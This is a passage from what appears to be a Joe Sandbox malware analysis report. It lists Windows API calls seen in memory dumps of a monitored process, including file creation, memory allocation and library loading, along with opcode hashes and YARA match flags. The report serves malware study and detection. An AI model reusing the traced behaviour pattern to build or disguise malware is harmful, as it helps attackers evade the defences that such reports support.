                                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02FE7795
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: e781e015f5b553a5ce44b153aa31decf02e1ab21d1b06a36d03cc0914bc86bbc
                                                                      • Instruction ID: ea3268746307d4eb8864da09c54f24fe47ac591945ab01192012bf2bddeb6e23
                                                                      • Opcode Fuzzy Hash: e781e015f5b553a5ce44b153aa31decf02e1ab21d1b06a36d03cc0914bc86bbc
                                                                      • Instruction Fuzzy Hash: 3231C3B5A01209ABCB14DF98DC80EDFB7B9AF8C754F108219FA19A7340D770A8118FA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02FE78D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 85a8feeb321cc1a4107a12ef65982b1488e8350cc4623e57efc19a80debd0cb4
                                                                      • Instruction ID: 5a70e34e377dfa31296c75e95b0a51d9161f9a06862af3378f1f55b1b56b45f0
                                                                      • Opcode Fuzzy Hash: 85a8feeb321cc1a4107a12ef65982b1488e8350cc4623e57efc19a80debd0cb4
                                                                      • Instruction Fuzzy Hash: 5931EAB1A00209AFDB14DF59DC80EEF77B9EF88754F104219F919A7240D770A811CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(02FD137E,?,02FE6767,00000000,00000004,00003000,?,?,?,?,?,02FE6767,02FD137E,02FE6767,52511CC4,02FD137E), ref: 02FE7B76
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: 8f7aace665b8c7e07a0a710b8c66c94054f6619566217540e487520006f1d731
                                                                      • Instruction ID: 39fe0fa27b970e32cbe5808f12f3ec56ed69b6e3a98c8cb540100dd75ecf04e3
                                                                      • Opcode Fuzzy Hash: 8f7aace665b8c7e07a0a710b8c66c94054f6619566217540e487520006f1d731
                                                                      • Instruction Fuzzy Hash: AA212FB1A00249ABDB14DF58DC41FAFB7BAEF88754F104509FE19A7240D770A911CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 5598071db94923eee74773c8ee4ca8f727c25d1bf74f4a6c06d581db5085786c
                                                                      • Instruction ID: e6cacddf5371c9206535811c9461c9f79c84fd23a115f2433f5960b9eceb3701
                                                                      • Opcode Fuzzy Hash: 5598071db94923eee74773c8ee4ca8f727c25d1bf74f4a6c06d581db5085786c
                                                                      • Instruction Fuzzy Hash: 4301C471A00204BBDA10EBA4CC01FAB73ADDF85750F10451DFB0997181DBB0B911CBE5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtClose.NTDLL(?,02FD2A3C,001F0001,?,00000000,?,02FE470A,00000104), ref: 02FE79A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: d40c05fe5bb3c403baf95651db62498e6630252b14d03dfc938d38f5934c72ef
                                                                      • Instruction ID: a0e0e6862c4d9e11aaa021f089be3a4ce8907de98852ec343c81b012be729652
                                                                      • Opcode Fuzzy Hash: d40c05fe5bb3c403baf95651db62498e6630252b14d03dfc938d38f5934c72ef
                                                                      • Instruction Fuzzy Hash: 11E08C367002447BD620FA59CC01FDB776EDFC6BA0F118419FA09A7241C6B0B9118BF4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 97f9859fdbb105da9ba633ea6a62ef6b93f514ea863e7b15d1b1cca56e0bcba9
                                                                      • Instruction ID: 0f5ca00d6eb445d2e7a4e2618b3ffa1aea86d26d01d4686b361a82b3773f330f
                                                                      • Opcode Fuzzy Hash: 97f9859fdbb105da9ba633ea6a62ef6b93f514ea863e7b15d1b1cca56e0bcba9
                                                                      • Instruction Fuzzy Hash: 189002616111044245407158498440770969BF13017D2C519A4544560CCA688856A26D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 065903eec688b22cc1249805a21584f6dc960df2be142862e984d9e80070bb9b
                                                                      • Instruction ID: d795f20d430a03219c350e591ba833700bf5c3c0d0a065acd209dc0d71b50c6d
                                                                      • Opcode Fuzzy Hash: 065903eec688b22cc1249805a21584f6dc960df2be142862e984d9e80070bb9b
                                                                      • Instruction Fuzzy Hash: 33900231615404129540715849C454750969BF0301F92C415E4414554CCE6489576365
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 77e461e785ccb4c61c272cee95d197236a7eef03399efa335800e6dba09b4234
                                                                      • Instruction ID: bc18e21400e72bb74933ab1d259370547d842dbae816c4d8050790f063d417da
                                                                      • Opcode Fuzzy Hash: 77e461e785ccb4c61c272cee95d197236a7eef03399efa335800e6dba09b4234
                                                                      • Instruction Fuzzy Hash: AF90023121100813D51161584684707109A8BE0241FD2C816A4414558DDAA68953B125
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a782952593b9926f3bcaed43155579461b99a605faf575bcfa78d0d2142d6ee0
                                                                      • Instruction ID: 1abfb38f53da48c2a0f59efb94c747810fb821abbe0fad337a927981d150523a
                                                                      • Opcode Fuzzy Hash: a782952593b9926f3bcaed43155579461b99a605faf575bcfa78d0d2142d6ee0
                                                                      • Instruction Fuzzy Hash: 4D90022161100902D50171584584617109B8BE0241FD2C426A5014555ECE758993B135
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 82c6e3d00902ae0df3a5a274207bde998e374f27ae3f29a8d65c56d65248917c
                                                                      • Instruction ID: 5ee05724c9033449de5c4fa94b028e61a70db692b3ace4404221404f8aad6e74
                                                                      • Opcode Fuzzy Hash: 82c6e3d00902ae0df3a5a274207bde998e374f27ae3f29a8d65c56d65248917c
                                                                      • Instruction Fuzzy Hash: CD90022922300402D5807158558860B10968BE1202FD2D819A4005558CCD65886A6325
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 86a1a793f498d8b808acdd36acfdd136ace1dcfbacdfa478d429d18099f709a4
                                                                      • Instruction ID: fff10f34023303ad7b32bcb7f0ae8579212287da8dc9c55b4ab6ada055007474
                                                                      • Opcode Fuzzy Hash: 86a1a793f498d8b808acdd36acfdd136ace1dcfbacdfa478d429d18099f709a4
                                                                      • Instruction Fuzzy Hash: 5090022131100403D540715855986075096DBF1301F92D415E4404554CDD6588576226
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 5fa1fbfe0c036e3b5efe2b1e77ee712ed9c6f7f3e631f3e36860c874bc59ba5e
                                                                      • Instruction ID: e40550c31c5cb1b014ba43387f3b0215cd0c56fcc8ac08adb51e62e216fd85c9
                                                                      • Opcode Fuzzy Hash: 5fa1fbfe0c036e3b5efe2b1e77ee712ed9c6f7f3e631f3e36860c874bc59ba5e
                                                                      • Instruction Fuzzy Hash: 35900221252045525945B158458450750979BF0241BD2C416A5404950CC9769857E625
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 352a619c1ac51180530ccedd2b274b7212489e775ad2b0456f4e214b9f782585
                                                                      • Instruction ID: 7e82da6391b80e601e0b8cc97fe033890d0bd56b3069326c0d25f0a4553f7318
                                                                      • Opcode Fuzzy Hash: 352a619c1ac51180530ccedd2b274b7212489e775ad2b0456f4e214b9f782585
                                                                      • Instruction Fuzzy Hash: A490022122180442D60065684D94B0710968BE0303F92C519A4144554CCD6588626525
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8ec5be4d1d858b98caf203f2f5d075dc5ead1fe7798965478e251dfc7d074d7b
                                                                      • Instruction ID: 6ba096ee7215bf48fb5d564e91b829f563eb3de2f35798a36ee5ed56e1fcfc1c
                                                                      • Opcode Fuzzy Hash: 8ec5be4d1d858b98caf203f2f5d075dc5ead1fe7798965478e251dfc7d074d7b
                                                                      • Instruction Fuzzy Hash: 4390026121140803D5406558498460710968BE0302F92C415A6054555ECE798C527139
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 61a7d4dd75df90a5bb9e7030c94070b64a8484118a622cdce165874aac5ab78c
                                                                      • Instruction ID: 1f35bcc8f715d3eec907510a8857f07b7bc95dd957130c554ae4e54037b368e9
                                                                      • Opcode Fuzzy Hash: 61a7d4dd75df90a5bb9e7030c94070b64a8484118a622cdce165874aac5ab78c
                                                                      • Instruction Fuzzy Hash: 0A90026135100842D50061584594B071096CBF1301F92C419E5054554DCA69CC53712A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a3968d154b1935860ec60c21866ee159ae71ef30a0a4a3ace70060438bca2070
                                                                      • Instruction ID: 8d6cb4a5066903e01080f8fe0ff88ede417817131a72d22d4ae81f371bff83c2
                                                                      • Opcode Fuzzy Hash: a3968d154b1935860ec60c21866ee159ae71ef30a0a4a3ace70060438bca2070
                                                                      • Instruction Fuzzy Hash: 3B900221611004424540716889C49075096AFF1211B92C525A4988550DC9A988666669
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: adf9c90c28edf99b0741b79c4a9ca3a762e7f450e0b36e4adff3bc1e09b27c08
                                                                      • Instruction ID: 97dc27476585df236e42d7f8009e130256cbe587936cfca9309cc9b120d3550e
                                                                      • Opcode Fuzzy Hash: adf9c90c28edf99b0741b79c4a9ca3a762e7f450e0b36e4adff3bc1e09b27c08
                                                                      • Instruction Fuzzy Hash: 55900225221004030505A558078450710D78BE5351792C425F5005550CDA7188626125
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: df8a698326f1d46b479c8e4d970e538c277ae7ea51d5bb63bedbe72e8be93317
                                                                      • Instruction ID: 79db5b3cb3ad280e5f22248d264afbcae34e65fcf786a8a909b789cb696b03b0
                                                                      • Opcode Fuzzy Hash: df8a698326f1d46b479c8e4d970e538c277ae7ea51d5bb63bedbe72e8be93317
                                                                      • Instruction Fuzzy Hash: FF90023121504C42D54071584584A4710A68BE0305F92C415A4054694DDA758D56B665
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 02FE25FB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 02FDE5D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: @J7<
                                                                      • API String ID: 2538663250-2016760708
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 02FDE5D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: @J7<
                                                                      • API String ID: 2538663250-2016760708
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02FD3E82
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 02FD774C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02FD3E82
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
